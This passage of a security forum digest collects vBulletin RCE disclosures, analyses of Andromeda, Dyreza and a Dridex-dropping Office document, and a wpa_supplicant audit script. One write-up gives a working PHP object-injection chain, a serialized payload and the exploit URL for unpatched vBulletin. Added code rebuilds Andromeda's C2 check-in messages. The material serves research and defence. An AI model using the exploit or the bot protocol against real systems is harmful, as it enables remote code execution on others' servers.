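    if not any(k in opts for k in CERT_OPTIONS):
        findings.append(
            f"{ssid} ({eap}): no ca_cert/ca_path, so the client accepts any "
            f"server certificate and will run its {opts.get('phase2', 'inner')} "
            "exchange inside a tunnel to a rogue access point")
    if not any(k in opts for k in SERVER_ID_OPTIONS):
        findings.append(
            f"{ssid} ({eap}): no domain_suffix_match/subject_match/"
            "altsubject_match, so any certificate issued by the trusted CA "
            "is accepted as the RADIUS server")
    return findings


def audit(conf: str) -> List[str]:
    """Audit every network block in a wpa_supplicant.conf string."""
    findings = []
    for opts in parse_networks(conf):
        findings.extend(audit_network(opts))
    return findings


# The article's own client configuration: no server validation at all.
VULNERABLE_CONF = """
network={
    ssid="CorpNetwork"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="TonyTestUser"
    password="<password>"
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
"""

# Same network with the countermeasures applied. The CA path and server name
# are constructed placeholders, not values from the article.
HARDENED_CONF = """
network={
    ssid="CorpNetwork"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="TonyTestUser"
    password="<password>"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"   # placeholder path
    domain_suffix_match="radius.corp.example"     # placeholder server name
    phase1="peaplabel=0"
    phase2="auth=MSCHAPV2"
}
"""

if __name__ == "__main__":
    for name, conf in (("vulnerable", VULNERABLE_CONF), ("hardened", HARDENED_CONF)):
        problems = audit(conf)
        print(f"{name}: {len(problems)} finding(s)")
        for p in problems:
            print("  -", p)
```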
-
Security Hub - The IT Security Professionals Social Network

Link: https://securityhub.io/index.php

Opinions? Suggestions?
-
In plain terms: FREE TICKETS TO DEFCAMP.

Link: DefCamp2015 Raffle | Cazacu Bogdan
-
Banning rock music in Romania (Online petition)
Nytro replied to Cosmin1314's topic in Non-IT Discussions
That's all, Gigi Becali for prime minister! -
Banning rock music in Romania (Online petition)
Nytro replied to Cosmin1314's topic in Non-IT Discussions
Violence? -
Check Point Discovers Critical vBulletin 0-Day
by Check Point Research Team, posted 2015/11/05

vBulletin is a commercial forum and blog platform developed by vBulletin Solutions, Inc. It was created over 10 years ago and is written in PHP. It is the world's most popular forum platform, powering ~78% of the forums among the top 100K web sites. Currently there are estimated to be over 40,000 live sites using vBulletin.

A month ago, Check Point privately reported a critical unauthenticated RCE vulnerability to vBulletin support. This vulnerability was independently discovered by Netanel Rubin and assigned CVE-2015-7808. When exploited, the vulnerability allows an attacker to execute PHP code on any vBulletin server without requiring user authentication. It does not require any themes or modules other than the ones installed by default.

As widely reported, the main vBulletin.org forum was compromised earlier this week and an exploit for a vBulletin 0-day was up for sale in online markets. A patch later released by vBulletin fixes the vulnerability reported, but fails to credit the reporting or to mention the appropriate CVE number. As the vulnerability is now fixed and an exploit exists in the wild with public analyses, we follow with the technical description as submitted to vBulletin. If you administer any vBulletin web site, we urge you to apply the patch as soon as possible, as exploitation risk is imminent. It is important to note that the analyzed public exploit shows a different chain than the one we used for our PoC; therefore we cannot link the attacks directly to our report.
Disclosure Timeline

Oct 4 2015: First contact with vBulletin
Oct 5 2015: First response received, asked for PGP key to securely transfer report
Oct 6 2015: PGP request denied: "I will hide the response so it's not publicly available"
Oct 10 2015: Sent complete report unencrypted as attached PDF
Oct 11 2015: "We cannot accept attachments in our ticket system – please upload this to your server and provide a link to download this."
Oct 11 2015: Uploaded report to a public server and sent a link. Updated with CVE-2015-7808 assignment.
Oct 14 2015: Asked vBulletin for confirmation/update
Oct 14 2015: "We're still working to establish the issues and identify any fixes that may be required."
Oct 27 2015: Asked vBulletin for confirmation/update
Oct 27 2015: "We're still working to establish the issues and identify any fixes that may be required."
Nov 2 2015: Patch released by vBulletin
Nov 5 2015: Public disclosure

Technical Description

vBulletin handles a lot of the heavy lifting through an internal API. Unfortunately, parts of that API are also used as a gate for Ajax requests, and as a result this API is also accessible through the regular CGI. This API does not validate the origin of the request, allowing us to access any part of its interface.
That interface, in fact, allows us to call any public method in any class that inherits from 'vB_Api' and is located in '/core/vb/api/'. This folder contains dozens of classes and hundreds of methods for us to use as an attack surface, and as noted, some of them are considered internal methods. Moreover, we can call these methods with any arguments we'd like, as the API doesn't have any sort of argument whitelisting.

Our findings begin with the vulnerable method 'vB_Api_Hook::decodeArguments()', which, again, requires no authentication, and at its first line of code contains an 'unserialize' call. This can be seen in the following code:

Because we control the '$arguments' parameter, we can also control what goes into the 'unserialize()' call. That means we can actually craft and inject any object we'd like into the '$args' variable.

PHP objects share several 'magic methods' that get called automatically whenever specific events occur. Such a trigger event, for example, is the destruction of an object (the '__destruct()' method gets called), or an attempt to use an object as a string, triggering its '__toString()' method.

That means we can now trigger a call to any '__destruct()' method of any defined class. We only need to set our object to be of that type, and when the 'decodeArguments()' function returns, that object will get destructed. Examine the following interesting destructor for vB_vURL:

This method takes the 'tmpfile' property and treats it as a file name that, if it exists, gets deleted. This can obviously be exploited to remove any file accessible to the web server, most likely rendering the server inoperable, or even causing permanent data loss. However, we are after higher goals. We can leverage this code to gain more access to protected methods in objects. If we insert another object into 'tmpfile', an attempt to convert it into a string will happen once the 'file_exists()' call is reached.
In effect, this now adds all '__toString()' methods to our widening attack surface. Take a look at vB_View's '__toString()':

This '__toString()' makes a call to vB_View's 'render()' method right off the bat. Unfortunately, this base 'render()' method doesn't do anything of interest for our exploitation purposes. Consider, however, the 'vB_View_AJAXHTML' class, inheriting from vB_View and implementing a very different 'render()' method:

As seen above, this 'render()' calls another 'render()', on the object under the 'content' property. Since we control that one, too, we can now target our 'render()' call at any class (not only vB_View objects). This leads us to the 'vB5_Template' class, which implements its own 'render()' method:

Basically, this method loads a template from the cache or DB using the template name specified in the 'template' property. Afterwards, it evals or includes it based on the template type. Because the template name is only used inside a (properly escaped) SQL query, we can't use it for an LFI attempt. Still, this allows us to load any template we want from the DB. Let's look at the 'widget_php' template code:

The 'code' value in the '$widgetConfig' dictionary is the argument for a function which (ultimately) evals its content. If we could control this variable, we would be able to execute any PHP code we'd like on the server. Let's see how we do exactly that.

The 'render()' method of the 'vB5_Template' class calls the 'extract()' function with '$this->registered' as an argument. As some readers may observe, 'extract()' receives a key-value dictionary as an argument and adds the key-value pairs as variables and respective values to the current scope. Because we control '$this->registered', we can add any variable and value to the current scope. Finally, we add the '$widgetConfig' variable to the 'registered' property and set its value to a dictionary containing 'code' as a key and our exploit PHP code as its value.
POC

Source: http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/
-
Revisiting the latest version of Andromeda/Gamarue Malware
2015/11/05 / Blueliv

Andromeda/Gamarue malware has been prevalent since it came into the limelight a couple of years ago, and the author has kept it well updated ever since. With respect to its earlier avatars, it has gone through several changes, from anti-analysis to a change in protocol format. Some excellent write-ups have already been made on it [1][2] previously, but in this blog we will revisit and analyze the latest version.

Andromeda/Gamarue hides itself through many layers, including its default one. Since its inception it has made use of many techniques to defeat extraction of the embedded configuration (URLs, keys, etc.), such as fake encryption, fake URLs, config encryption and many more. Meanwhile, we also found a sample which had obfuscation techniques such as opaque predicates to hinder static analysis.

Andromeda/Gamarue consists of two payloads, a default unpacker and a main payload. We are going to cover both in this post. It starts by loading some of the native functions, identified by hashes using a simple hashing algorithm, and stores the API addresses in stack variables. To get a basic overview of the binary we will generate a run-time dynamic call graph to help us understand the functionality to some extent. It shows some calls to LdrProcessRelocationBlock(), which gives us an indication about where and how the payload is unpacked. The binary consists of a data blob in the .rdata section of the PE file which holds information regarding the unpacked payload. It has the following structure:

The integrity of the payload is checked against a hard-coded crc32 hash value and, if the hash is verified, it further proceeds to decrypt and decompress the payload using a 16-byte RC4 key and aPLib decompression. This chunk is copied to an allocated heap region which is purposely created by using MEM_COMMIT or MEM_TOP_DOWN, which might be used to bypass some scanning engines or dumpers.
The base relocations are applied to that memory region using the RelocationTableOffset field. Another block of executable memory of size 1000h is allocated, which will later on be used for copying stolen API code. Then, DLLs and imports are parsed. DLL names can again be found as hashes. The first instruction is copied from an API location to this particular memory region and a succeeding jump is placed after it to the original instructions. This is done to bypass API hooking. It consists of an x86 instruction parsing subroutine. Subroutine calls and unconditional jumps follow, subsequent instructions are copied and a jump to the OEP is made.

MAIN PAYLOAD

The main payload consists of an installer and a primary payload responsible for communicating with the command and control centre. Let's take a look at the call graph of the installer part:

It starts by getting the serial number of the root drive (which will later on be used as part of the C2 request). It also has a function to check for the presence of certain processes and, if they are found, it goes into an infinite loop. These checks are bypassed if a registry key "is_not_vm" is found in HKEY_LOCAL_MACHINE\software\policies. The key has to be equal to VolumeSerialNumber. An environment variable is created from XORing VolumeSerialNumber with 0x737263, which is assigned to the module file name. This environment variable acts as an indicator of a previous instance of the binary. It also sets up an event named after XORing VolumeSerialNumber with 0x696E6A63. This payload is injected inside "msiexec.exe" by changing the entry point to "push <base of injected code>; ret" and waits for the event to be triggered by the main payload. The main payload nulls the packer PE headers and sections. Following this, it adjusts the privileges, sets TaskbarNoNotification, and disables UAC, Windows Action Centre, as well as some security related services (only if the "bb" parameter is not set).
Explained below:

If the necessary privileges are not found, it will try to elevate privileges by using the "Runas" verb. C2 servers are encrypted and stored using a crc32 hash of PE data and an incremental XOR value. After that, it makes a connection to each C2 with the following JSON request:

    {"id":%lu,"bid":%lu,"os":%lu,"la":%lu,"rg":%lu,"bb":%lu}

    ID  = VolumeSerialNumber
    BID = botnetID
    OS  = OSVersion
    LA  = Local IP address
    RG  = isprivileged?
    BB  = islocalized (Russia, Ukraine, Belarus and Kazakhstan)

This request is encrypted using a 32-byte RC4 key and the response is also decrypted using the same RC4 key (earlier versions would have used the 4-byte ID as the response key). The request also comes in JSON format now. It consists of a JSON parser compiled from https://github.com/udp/json-parser/. The return value from the JSON parser is represented this way:

The above JSON structure is expressed in the following format:

    [next_request_sleeptime (minutes), {Unimplemented_object}, [TaskID, RequestType, 'URL'-N/A] ...]

The first item in the array is the next request sleep time: the time frame in minutes after which the next iteration of calling the C2 is performed. The second item in the list is an unimplemented / unused type; when this object is found, it is simply skipped. The rest are single or multiple arrays which may consist of a URL payload. TaskID is the UID of a task provided by the C2 server; this ID is sent back in a following request. The request type is an identifier of the task type, e.g. download URL, plugin download or delete bot. These URLs can either be EXEs or plugins. Plugins are encrypted and compressed with RC4 and aPLib.
After completing the specified task, another request is sent back to the C2 server, which has the following format:

    {"id":%lu,"tid":%lu,"err":%lu,"w32":%lu}

    ID:  VolumeSerialNumber
    TID: TaskID
    ERR: Error level on task completion (0: no error; otherwise starting from 0x10)
    W32: Error number from GetLastError()

Raashid Bhat, Malware Analyst

Source: https://www.blueliv.com/research/revisiting-the-latest-version-of-andromedagamarue-malware/
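The check-in, task response and result report described above, worked through as an added example (not code from the Blueliv post or from the malware): the JSON layouts follow the post, while the 32-byte RC4 key and the captured response bytes are constructed here so the script runs offline. The post does not list the numeric request types, so they are kept as raw integers.

```python
"""Decode and parse the Andromeda/Gamarue C2 exchange described above.

Added example, not code from the Blueliv write-up or from the malware. The JSON
layouts are the ones given in the post; the 32-byte RC4 key and the captured
response bytes are constructed here so the script runs offline. The post does
not list the numeric request types, so they are kept as raw integers.
"""
import json
from dataclasses import dataclass
from typing import List, Tuple


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA). Symmetric, so it both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


@dataclass
class Task:
    task_id: int       # UID assigned by the C2, echoed back in the result report
    request_type: int  # task kind (download URL, plugin download, delete bot ...)
    url: str           # payload URL; empty when the task carries none (N/A)


def build_checkin(volume_serial: int, botnet_id: int, os_version: int,
                  local_ip: int, privileged: bool, localized: bool) -> str:
    """First request: {"id","bid","os","la","rg","bb"}, all unsigned ints (%lu).
    The local IP is passed already packed as a 32-bit integer."""
    fields = {"id": volume_serial, "bid": botnet_id, "os": os_version,
              "la": local_ip, "rg": int(privileged), "bb": int(localized)}
    return json.dumps(fields, separators=(",", ":"))


def build_report(volume_serial: int, task_id: int, err: int, w32: int) -> str:
    """Result report sent after a task: {"id","tid","err","w32"}."""
    fields = {"id": volume_serial, "tid": task_id, "err": err, "w32": w32}
    return json.dumps(fields, separators=(",", ":"))


def parse_response(plaintext: bytes) -> Tuple[int, List[Task]]:
    """Parse [sleep_minutes, {unimplemented}, [TaskID, RequestType, URL], ...].

    Objects are skipped, as the bot skips the unimplemented object; every
    remaining array becomes a Task."""
    doc = json.loads(plaintext.decode("utf-8"))
    if not isinstance(doc, list) or not doc:
        raise ValueError("response is not a JSON array")
    sleep_minutes = int(doc[0])
    tasks = []
    for item in doc[1:]:
        if not isinstance(item, list) or len(item) < 2:
            continue
        url = str(item[2]) if len(item) > 2 and item[2] else ""
        tasks.append(Task(int(item[0]), int(item[1]), url))
    return sleep_minutes, tasks


def decode_response(ciphertext: bytes, key: bytes) -> Tuple[int, List[Task]]:
    """RC4-decrypt a captured response with the bot's key, then parse it."""
    return parse_response(rc4(key, ciphertext))


# Constructed sample: a 32-byte key and a response built from it, standing in
# for a key recovered from memory and bytes taken from a network capture.
SAMPLE_KEY = bytes(range(0x20, 0x40))
SAMPLE_PLAINTEXT = (b'[30,{},[1001,1,"http://example.invalid/update.exe"],'
                    b'[1002,3,""]]')
SAMPLE_RESPONSE = rc4(SAMPLE_KEY, SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print(build_checkin(0x12345678, 7, 61, 0x01020304, True, False))
    sleep, tasks = decode_response(SAMPLE_RESPONSE, SAMPLE_KEY)
    print(f"next check-in in {sleep} minutes")
    for t in tasks:
        print(f"  task {t.task_id}: type {t.request_type}, url={t.url or 'N/A'}")
        print("  report:", build_report(0x12345678, t.task_id, 0, 0))
```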
-
vBulletin 5 PreAuth RCE writeup
by @_cutz

As came to my attention, a guy named Coldzer0 is selling a vBulletin RCE exploit on http://0day.today. In his video he exploited several vBulletin boards while surfing on Google... This ended in the vBulletin main forum being pwned on Monday (11/02/15).

vBulletin implements certain ajax API calls in /core/vb/api/, one of them is hook.php:

    public function decodeArguments($arguments)
    {
        if ($args = @Unserialize($arguments))
        {
            $result = '';
            foreach ($args AS $varname => $value)
            {
                $result .= $varname;

Apart from the obvious unserialize() not much else happening there -- luckily we have in /core/vb/db/result.php:

    class vB_dB_Result implements Iterator
    {
        ...
        public function rewind()
        {
            //no need to rerun the query if we are at the beginning of the recordset.
            if ($this->bof)
            {
                return;
            }
            if ($this->recordset)
            {
                $this->db->free_result($this->recordset);
            }

rewind() is the first function to get called when an Iterator object is accessed via foreach(). Then we have in /core/vb/database.php:

    abstract class vB_Database
    {
        ...
        function free_result($queryresult)
        {
            $this->sql = '';
            return @$this->functions['free_result']($queryresult);
        }

Which gives easy RCE. Setup objects accordingly:

    $ php << 'eof'
    <?php
    class vB_Database {
        public $functions = array();
        public function __construct() {
            $this->functions['free_result'] = 'phpinfo';
        }
    }
    class vB_dB_Result {
        protected $db;
        protected $recordset;
        public function __construct() {
            $this->db = new vB_Database();
            $this->recordset = 1;
        }
    }
    print urlencode(serialize(new vB_dB_Result())) . "\n";
    eof
    O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

Just surf to:

    http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D

The fix was just replacing the unserialize() with json_decode(). Btw this bug has been sitting in vBulletin for more than three years.

-- cutz

Source: Private Paste - Pastie
-
Windows Subsystem Used to Bypass Microsoft EMET By Eduard Kovacs on November 03, 2015 Researchers have once again managed to bypass Microsoft’s Enhanced Mitigation Experience Toolkit (EMET), this time by leveraging the Windows subsystem WoW64. WoW64 (Windows 32-bit on Windows 64-bit) is a compatibility layer in Windows designed to allow unmodified 32-bit applications to run on 64-bit systems. While it’s very useful, researchers demonstrated in the past that WoW creates an attack surface that can be used by malicious actors to bypass antivirus software and exploit mitigations. Researchers at two-factor authentication (2FA) solutions provider Duo Security have found a way to use WoW64 to bypass Microsoft EMET, a tool designed to make it more difficult and more expensive for attackers to exploit a system. While EMET bypass methods have been presented several times in the past, Duo Security says its method can be used to bypass all payload execution and return-oriented programming (ROP) mitigations in one shot, in a generic, app-independent way. According to Duo Security, 80 percent of browsers are 32-bit processes running under WoW64 on a 64-bit system. This is relevant in this case as web browser exploitation is one of the most common vectors used by malicious actors to breach systems. In order to demonstrate their findings, researchers modified an existing exploit for a use-after-free vulnerability in Adobe Flash Player (CVE-2015-0311). They successfully reproduced the bypass on a 64-bit version of Windows 7 running Internet Explorer 10 and the latest versions of EMET, 5.2 and 5.5 beta. “While EMET provides support for both 32 and 64-bit processes, as a limitation of its design, it does not explicitly handle the special case of WoW64 processes. This makes using a 64-bit ROP chain and secondary stage a relatively straightforward method for bypassing a significant number of EMET’s mitigations,” Duo Security explained in its research paper. 
"Furthermore, 64-bit editions of EMET do not support any of the ROP-related mitigations, further limiting EMET's effectiveness on 64-bit processes. It appears that due to these limitations, enhancing EMET to overcome them is likely a non-trivial effort."

Darren Kemp, researcher at Duo Security, has pointed out that the paper's goal is not to undermine the importance of EMET's role in defending organizations against cyberattacks, but to highlight shortcomings in the current version.

"EMET is largely effective at complicating a variety of exploitation techniques in true 32- and 64-bit applications, often requiring attackers to find a solution to each mitigation on a case-by-case basis. Most off-the-shelf exploits will fail in the face of EMET mitigations," Duo Security said. "But due to the architectural quirks of the WoW64 subsystem, mitigations provided by EMET are significantly less effective due to the way they are inserted into the process. Fixing this issue requires significant modifications to how EMET works."

Microsoft has provided the following statement: "We continue to research new mitigations to integrate into the Enhanced Mitigation Experience Toolkit (EMET). Deploying EMET helps make it more difficult for attackers to exploit a system, which moves the balance of power in the customer's favor."

Source: http://www.securityweek.com/windows-subsystem-used-bypass-microsoft-emet
-
A Technical Look At Dyreza

In a previous post we presented unpacking the 2 payloads delivered in a spam campaign, a malicious duet: Upatre (malware downloader) and Dyreza (credential stealer). In this post we will take a look at the core of Dyreza and the techniques that it uses. Note that Dyreza is a complex piece of malware and various samples come with various techniques; however, the main features remain common.

Analyzed samples

ff3d706015b7b142ee0a8f0ad7ea2911 - Dyreza executable, a persistent botnet agent carrying DLLs with the core malicious activities
5a0e393031eb2accc914c1c832993d0b - Dyreza DLL (32 bit)
91b62d1380b73baea53a50d02c88a5c6 - Dyreza DLL (64 bit)

Behavioral analysis

When Dyreza starts to infect the computer, it spreads like fire. Observing it in Process Explorer, we can see many new processes appearing and disappearing. As we can notice, it deploys explorer, svchost, taskeng, and loads some DLL via dllhost... All this is done in order to obfuscate the flow of execution, in the hope of confusing analysts.

Two copies of the malicious file are dropped, in C:\Windows and %APPDATA%, under pseudo-random names matching the regex [a-zA-Z]{15}.exe, e.g. vfHNLkMCYaxBGFy.exe.

Persistence is achieved by adding a new task in the task scheduler: it deploys the malicious sample every minute, to ensure that it keeps running.

Code injected into other processes (svchost, explorer) communicates with the C&C:

When we launch any web browser, it directly injects code into its process and deploys illegitimate connections. This is the way it keeps in touch with the C&C, monitors the user's activity and steals credentials.

We can also see SQLite files (etilqs_*) created in a TEMP folder that serve as a small database where Dyreza stores information.

Collected data are stored in a dedicated folder before they are sent to the C&C:

Inside the code

Main executable

Dyreza doesn't start on a machine that has fewer than 2 processors.
This technique is used as a defense, preventing the file from running on a VM. It is based on the observation that VMs usually have only one processor, in contrast to most physical machines used nowadays. It is implemented by checking the appropriate field in the PEB (Process Environment Block), which is pointed to by FS:[30]. Infection continues only if the condition is satisfied.

At the beginning of execution, the malware loads an additional import table into a newly allocated memory page. Names of modules and functions are decrypted at runtime.

It checks whether it is deployed under a debugger using the function LookupPrivilegeValue with the argument SeDebugPrivilege; if it returns a non-zero value, execution is terminated.

Valid execution follows a few alternative paths. The decision about which path to follow is made based on the initial conditions, such as the executable path and the arguments with which the program was run. When it is deployed for the first time (from a random location), it makes its own copy into C:\Windows and %APPDATA% and deploys the copy as a new process. As an argument to the deployed copy (from C:\Windows) it passes the path to the other copy.

If it is deployed from the valid path and the initial argument passed validation, it performs another check, verifying whether it is deployed for the first time. This is achieved by creating a specific Global (its name is a hash of the computer name and OS version, fetched by the functions GetComputerName and RtlGetVersion). If this condition is also satisfied and the mutex already exists, then it follows the main path, deploying the malicious code.

First, the encrypted data and the key are loaded from the executable's resources:

    T1RY615NR - encrypted 32 bit code
    UZGN53WMY - the key
    YS45H26GT - encrypted 64 bit code

Unpacking: The unpacking algorithm is pretty simple. key_data contains the values and data is a list of indexes of the values in key_data.
We process the list of indexes and read the corresponding values:

    def decode(data, key_data):
        # data holds one index per output byte; each index selects a byte of key_data
        decoded = bytearray()
        for i in range(0, len(data)):
            val_index = data[i]
            decoded.append(key_data[val_index])
        return decoded

This script decrypts dumped resources: https://github.com/hasherezade/malware_analysis/blob/master/dyreza/dyreza_decoder.py

The revealed content contains a shellcode to be injected and a DLL with malicious functions (32 or 64 bit, as appropriate). The main sample chooses which one to unpack and deploy by checking whether it is running under WOW64 (emulation for 32 bit on a 64 bit machine), calling the function IsWow64Process.

Malicious DLL (core)

At this stage, the functionality of the malware becomes pretty clear. The DLL does not contain much obfuscation: it has clear strings and a typical import table. We can see the strings that are used for communication with the C&C:

Both the 32 and 64 bit DLLs have analogous functionality. Only architecture-related elements and strings are different. The agent identifies the system and sends the information to the C&C:

A similar procedure is present in the 64 bit version of the DLL; only the hardcoded string "_32bit" is substituted by "_64bit":

Also, network settings are examined (to verify and inform the C&C whether the client can establish a back connection; command: AUTOBACKCONN).

It injects its modules into the following browsers:

Below, an attempt to send stolen account credentials:

In addition to monitoring browsers, it also collects general information about the computer (its configuration, existing users) in the form of a report:

The malware not only steals information and sniffs the user's browsing, but also tries to take full control over the system, executing various shell commands (system shutdown, etc.). Some examples below:

Trying to add a user with administrative privileges

Shutdown system on command (AUTOKILLOS)

C&Cs

This botnet is prepared with great care.
Not only is communication encrypted, but many countermeasures have also been taken in order to prevent detection. First of all, the address of the C&C is randomly picked from a hard-coded pool. This pool is stored in one of the resources of the Dyreza DLL (AES encrypted). Below, we can see how it gets decrypted during execution of the payload:

(A script for decrypting the list of C&Cs from dumped resources is available here: https://github.com/hasherezade/malware_analysis/blob/master/dyreza/dyrezadll_decoder.py)

Also, the certificate served by a particular C&C changes on each connection. The infrastructure is built on a network of compromised WiFi routers (most often AirOS and MikroTik). The server receives encrypted connections on port 443 (standard HTTPS) or 4443 (in case the standard HTTPS port of a particular router is occupied by a legitimate service).

Conclusion

Dyreza is an eclectic malware, developed by professionals. It is clear that they are constantly working on quality: each new version carries some new ideas and improvements, making analysis harder.

Appendix

Very good Dyreza/Upatre tracker: https://techhelplist.com/maltlqr/ by @Techhelplistcom (list of C&Cs from the current sample: https://techhelplist.com/maltlqr/reports/01oct-20oct-status.txt)

Scripts used in this post: https://github.com/hasherezade/malware_analysis/tree/master/dyreza

Source: https://blog.malwarebytes.org/intelligence/2015/11/a-technical-look-at-dyreza/
-
Analysis Of An Office Maldoc With Encrypted Payload (Quick And Dirty)

Didier Stevens

The malicious office document we’re analyzing is a downloader: 0e73d64fbdf6c87935c0cff9e65fa3be

oledump reveals VBA macros in the document, but the plugins are not able to extract a URL:

Let’s use a new plugin that I wrote: plugin_vba_dco. This plugin searches for Declare statements and CreateObject calls:

In the first half of the output (1) we see all lines containing the Declare or CreateObject keyword. In the second half of the output (2) we see all lines containing calls to declared functions or created objects.

Although the code is obfuscated (obfuscation of strings and variable names), the output of this plugin allows us to guess that Ci8J27hf2 is probably an XMLHTTP object, because of the .Open, .send, .Status, … methods and properties.

The Open method of the XMLHTTP object takes 3 parameters: the HTTP method, the URL and a boolean (asynchronous or synchronous call):

As we can see, the third parameter is False and the first 2 parameters are the return value of a function called IpkfHKQ2Sd. This function takes 2 parameters: 2 strings. The first string is the result of concatenated Chr functions, and the second string is a literal string. Since the Open method requires the HTTP method and URL as strings, it is very likely that function IpkfHKQ2Sd is a decoding function that takes 2 strings as input (meaningless to us) and returns a meaningful string.

Here is the original IpkfHKQ2Sd function. It’s heavily obfuscated:

Here is the same function that I deobfuscated. I didn’t change the function name, but I removed all useless code, renamed variables and added indentation:

We can now see that this function uses a key (sKey) and XOR operations to decode a secret string (sSecret). And now we can also see that this is just a string manipulation function. It does not contain malicious or dangerous statements or function calls. So it is safe to use in a VBA interpreter; we don’t need to translate it into another language like Python.

We are going to use this deobfuscated function in a new spreadsheet to decode the URL parameter:

In the VBA editor of this new spreadsheet, we have the deobfuscated IpkfHKQ2Sd function and a test subroutine that calls the IpkfHKQ2Sd function with the strings that we found in the .Open method for the URL argument. The decoded string returned by function IpkfHKQ2Sd is displayed via MsgBox. Executing this test subroutine reveals the URL:

Downloading this file, we see it’s not a JPEG file, but contrary to what we could expect, it’s not an EXE file either:

Searching for .responseBody in the VBA code, we see that the downloaded file (present in .responseBody) is passed as an argument to function IpkfHKQ2Sd:

This means that the downloaded file is also encoded. It needs to be decoded with the same function as we used for the URL: function IpkfHKQ2Sd (but with another key).

To convert this file with the deobfuscated function in our spreadsheet, we need to load the file in the spreadsheet, decode it, and save the decoded file to disk. This can be done with my FileContainer.xls tool (to be released). First we load the encoded file in the FileContainer:

FileContainer supports file conversion: we have to use command C and push the Process Files button:

Here is the default conversion function Convert. This default function doesn’t change the file: the output is equal to the input:

To decode the file, we need to update the Convert function to call the decoding function IpkfHKQ2Sd with the right key. Like this:

And then, when we convert the file, we obtain an EXE file:

This EXE turns out to be Dridex malware: 50E3407557500FCD0D81BB6E3B026404

Remark: reusing code from malware is dangerous unless we know exactly what the code does. To decode the downloaded file quickly, we reused the decoding VBA function IpkfHKQ2Sd (I did not translate it into another language like Python). But to be sure it was not malicious, I deobfuscated it first. The deobfuscation process gave me the opportunity to look at each individual statement, thereby giving me insight into the code and leading me to the conclusion that this function is not dangerous. We could also have used the obfuscated function, but then we would have run the risk that malware would execute because we did not fully understand what the obfuscated function did. Translating the obfuscated function to another language doesn’t make it less dangerous, but it allows us to execute it in a non-Windows environment (like Linux), thereby preventing Windows malware from executing.

Source: Analysis Of An Office Maldoc With Encrypted Payload (Quick And Dirty) | Didier Stevens
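As an added example (not Didier's deobfuscated VBA or his FileContainer tool), here is the same two-step workflow in Python: decode the URL string, then decode the downloaded body with a second key, and sanity-check that the result is really a PE before trusting it. The repeating-key XOR scheme, the keys, the placeholder URL and the fake PE stub are all constructed assumptions, since the post does not reproduce the exact arithmetic of IpkfHKQ2Sd.

```python
import struct

def xor_decode(secret: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: the scheme assumed here for IpkfHKQ2Sd
    (the post only says it XORs sSecret with sKey)."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(secret))

def looks_like_pe(data: bytes) -> bool:
    """Sanity check on a decoded blob: 'MZ' at offset 0 and the 'PE\\0\\0'
    signature at the e_lfanew offset stored at 0x3C."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"

def decode_download(secret: bytes, key: bytes):
    """Decode a downloaded body and report whether the result is a PE file,
    so a wrong key (or a changed sample) is caught instead of trusted."""
    plain = xor_decode(secret, key)
    return plain, looks_like_pe(plain)

# Constructed fixtures (placeholders, not the sample's real strings): a URL
# and a minimal fake PE stub, each encoded with its own made-up key. XOR is
# symmetric, so encoding uses the same routine as decoding.
URL_KEY = b"k3y"
URL_SECRET = xor_decode(b"http://example.invalid/image.jpg", URL_KEY)
FILE_KEY = b"s3cr3t"
FAKE_PE = (b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40)
           + b"PE\x00\x00" + b"\x00" * 16)
FILE_SECRET = xor_decode(FAKE_PE, FILE_KEY)

if __name__ == "__main__":
    print(xor_decode(URL_SECRET, URL_KEY).decode())
    _, is_pe = decode_download(FILE_SECRET, FILE_KEY)
    print("decoded body is a PE:", is_pe)
```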
-
By Daniel Cid on November 4, 2015

The vBulletin team patched a serious object injection vulnerability yesterday that can lead to full command execution on any site running an out-of-date vBulletin version. The patch supports the latest versions, from 5.1.4 to 5.1.9.

The vulnerability is serious and easy to exploit; it was used to hack and deface the main vBulletin.com website. As a precaution, all passwords were reset; you will have to create a new one before you can access vbulletin.com again and download the patches.

Exploits in the Wild

This vulnerability seems to have been around for a bit. We were able to trace exploit attempts to the end of October; they were targeting a few high profile vBulletin sites protected by our Website Firewall. The exploit was shared publicly yesterday. It attacks the decodeArguments Ajax API hook. Here is an example of an exploit attempt in the wild:

